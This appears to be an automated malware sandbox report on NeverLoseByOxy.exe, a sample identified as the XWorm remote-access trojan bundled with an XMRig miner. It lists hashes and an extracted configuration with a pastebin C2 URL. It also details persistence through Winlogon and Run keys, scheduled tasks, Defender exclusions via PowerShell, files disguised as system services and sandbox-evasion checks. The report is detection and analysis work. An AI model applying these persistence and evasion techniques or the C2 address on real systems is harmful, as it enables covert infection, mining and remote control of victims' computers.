Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
08-11-2024 10:15
Static task
static1
Behavioral task
behavioral1
Sample
NeverLoseByOxy.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
NeverLoseByOxy.exe
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral3
Sample
NeverLoseByOxy.exe
Resource
win11-20241007-en
General
-
Target
NeverLoseByOxy.exe
-
Size
5.7MB
-
MD5
24f6e0f1cd42246f176a505f8d7d1c4d
-
SHA1
5160c3f78672b86970135261941e2ad003d44ba1
-
SHA256
b5cce9b75d7d336fc8d3ebe678af0a9b25ade673964c86a5527df736fdd3ec84
-
SHA512
77b48b6652526f4d8a571eaaf539181385c8b3ada0e974caf5c4949fa289c46694bab0e8b0e91048d76be87fe0003ea98bc605f560792df7fefde1465ab7da85
-
SSDEEP
98304:whhqDOlIP2BtJIx4hpebqKbhAUDdROejIAV/PCqa5oRJ0XkKPdKH10msJ:whhqaIMg6wqKbyUDdROCIAV/PCkIkKFn
Malware Config
Extracted
xworm
-
Install_directory
%ProgramData%
-
install_file
IAStorDataMgrSvc.exe
-
pastebin_url
http://pastebin.com/raw/kTS4qiww
Signatures
-
Detect Xworm Payload 13 IoCs
resource yara_rule behavioral1/files/0x000a000000023b7e-152.dat family_xworm behavioral1/files/0x000a000000023b7f-212.dat family_xworm behavioral1/memory/3428-265-0x0000000000590000-0x00000000005A6000-memory.dmp family_xworm behavioral1/files/0x000a000000023b80-273.dat family_xworm behavioral1/memory/1032-319-0x0000000000B80000-0x0000000000B98000-memory.dmp family_xworm behavioral1/files/0x000a000000023b81-334.dat family_xworm behavioral1/memory/1920-380-0x0000000000DE0000-0x0000000000DF8000-memory.dmp family_xworm behavioral1/memory/1812-393-0x0000000000AC0000-0x0000000000AD4000-memory.dmp family_xworm behavioral1/memory/676-1193-0x0000000000B20000-0x0000000000B36000-memory.dmp family_xworm behavioral1/memory/6004-1207-0x0000000000BB0000-0x0000000000BC8000-memory.dmp family_xworm behavioral1/memory/3364-1268-0x00000000006E0000-0x00000000006F6000-memory.dmp family_xworm behavioral1/memory/5404-1277-0x0000000000F40000-0x0000000000F58000-memory.dmp family_xworm behavioral1/memory/5632-1285-0x00000000000B0000-0x00000000000C4000-memory.dmp family_xworm -
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\NeverLose.exe, C:\\Windows\\system32\\userinit.exe" reg.exe -
Xmrig family
-
Xworm family
-
XMRig Miner payload 6 IoCs
resource yara_rule behavioral1/memory/4276-663-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/4276-664-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/4276-669-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/4276-668-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/4276-667-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/4276-666-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2764 powershell.exe 4424 powershell.exe 392 powershell.exe 1952 powershell.exe 1500 powershell.exe 3644 powershell.exe 2056 powershell.exe 1616 powershell.exe 2432 powershell.exe 2144 powershell.exe 3316 powershell.exe 3180 powershell.exe 636 powershell.exe 4520 powershell.exe 1672 powershell.exe 2360 powershell.exe 3416 powershell.exe 1028 powershell.exe -
Creates new service(s) 2 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 11 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation NeverLose.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation expl.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation SMSvcHost.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation ApplicationFrameHost.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation NeverLoseByOxy.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation L.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation exp.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation IAStorDataMgrSvc.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation Realtek HD Audio Universal Service.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation LN.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation temp.exe -
Drops startup file 8 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Realtek HD Audio Universal Service.lnk Realtek HD Audio Universal Service.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IAStorDataMgrSvc.lnk IAStorDataMgrSvc.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IAStorDataMgrSvc.lnk IAStorDataMgrSvc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ApplicationFrameHost.lnk ApplicationFrameHost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ApplicationFrameHost.lnk ApplicationFrameHost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Realtek HD Audio Universal Service.lnk Realtek HD Audio Universal Service.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SMSvcHost.lnk SMSvcHost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SMSvcHost.lnk SMSvcHost.exe -
Executes dropped EXE 20 IoCs
pid Process 5112 LN.exe 1780 L.exe 4424 temp.exe 2212 NeverLose.exe 4900 expl.exe 4516 exp.exe 2380 svchost.exe 3428 IAStorDataMgrSvc.exe 1032 SMSvcHost.exe 1920 ApplicationFrameHost.exe 1812 Realtek HD Audio Universal Service.exe 1592 svchost.exe 676 IAStorDataMgrSvc.exe 6004 ApplicationFrameHost.exe 6032 Realtek HD Audio Universal Service.exe 6100 SMSvcHost.exe 3364 IAStorDataMgrSvc.exe 5404 ApplicationFrameHost.exe 5632 Realtek HD Audio Universal Service.exe 5668 SMSvcHost.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\ProgramData\\Realtek HD Audio Universal Service.exe" Realtek HD Audio Universal Service.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SMSvcHost = "C:\\ProgramData\\SMSvcHost.exe" SMSvcHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\IAStorDataMgrSvc = "C:\\ProgramData\\IAStorDataMgrSvc.exe" IAStorDataMgrSvc.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ApplicationFrameHost = "C:\\ProgramData\\ApplicationFrameHost.exe" ApplicationFrameHost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 29 pastebin.com 30 pastebin.com 32 pastebin.com 22 pastebin.com 24 pastebin.com -
Drops file in System32 directory 16 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A OfficeClickToRun.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\System32\Tasks\Realtek HD Audio Universal Service svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Tasks\ApplicationFrameHost svchost.exe File opened for modification C:\Windows\System32\Tasks\SMSvcHost svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\MRT.exe svchost.exe File opened for modification C:\Windows\system32\MRT.exe svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2380 set thread context of 3396 2380 svchost.exe 141 PID 1592 set thread context of 1728 1592 svchost.exe 163 PID 1592 set thread context of 4456 1592 svchost.exe 164 PID 1592 set thread context of 4276 1592 svchost.exe 166 -
resource yara_rule behavioral1/memory/4276-659-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/4276-660-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/4276-661-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/4276-658-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/4276-662-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/4276-663-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/4276-664-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/4276-669-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/4276-668-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/4276-667-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/4276-666-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 336 sc.exe 3164 sc.exe 4556 sc.exe 1200 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NeverLose.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language exp.exe -
Checks SCSI registry key(s) 3 TTPs 21 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1731061008" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Fri, 08 Nov 2024 10:16:49 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={028D3B53-8845-416C-B6A3-C334118DC385}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs svchost.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ exp.exe Set value (int) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5268 schtasks.exe 5236 schtasks.exe 5388 schtasks.exe 4544 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 3428 IAStorDataMgrSvc.exe 1812 Realtek HD Audio Universal Service.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1672 powershell.exe 1672 powershell.exe 3180 powershell.exe 3180 powershell.exe 1672 powershell.exe 3180 powershell.exe 3644 powershell.exe 3644 powershell.exe 2056 powershell.exe 2056 powershell.exe 3644 powershell.exe 1616 powershell.exe 1616 powershell.exe 1616 powershell.exe 2056 powershell.exe 2432 powershell.exe 2432 powershell.exe 2144 powershell.exe 2144 powershell.exe 2764 powershell.exe 2764 powershell.exe 2360 powershell.exe 2360 powershell.exe 2548 taskmgr.exe 2548 taskmgr.exe 2432 powershell.exe 2144 powershell.exe 2764 powershell.exe 2360 powershell.exe 2380 svchost.exe 3316 powershell.exe 3316 powershell.exe 3316 powershell.exe 2548 taskmgr.exe 2548 taskmgr.exe 4520 powershell.exe 4520 powershell.exe 636 powershell.exe 636 powershell.exe 3416 powershell.exe 3416 powershell.exe 3416 powershell.exe 636 powershell.exe 4520 powershell.exe 4424 powershell.exe 4424 powershell.exe 4424 powershell.exe 2380 svchost.exe 2380 svchost.exe 2380 svchost.exe 3396 dialer.exe 3396 dialer.exe 2548 taskmgr.exe 2548 taskmgr.exe 2380 svchost.exe 2380 svchost.exe 2380 svchost.exe 1592 svchost.exe 392 powershell.exe 392 powershell.exe 1952 powershell.exe 1952 powershell.exe 1952 powershell.exe 392 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2548 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
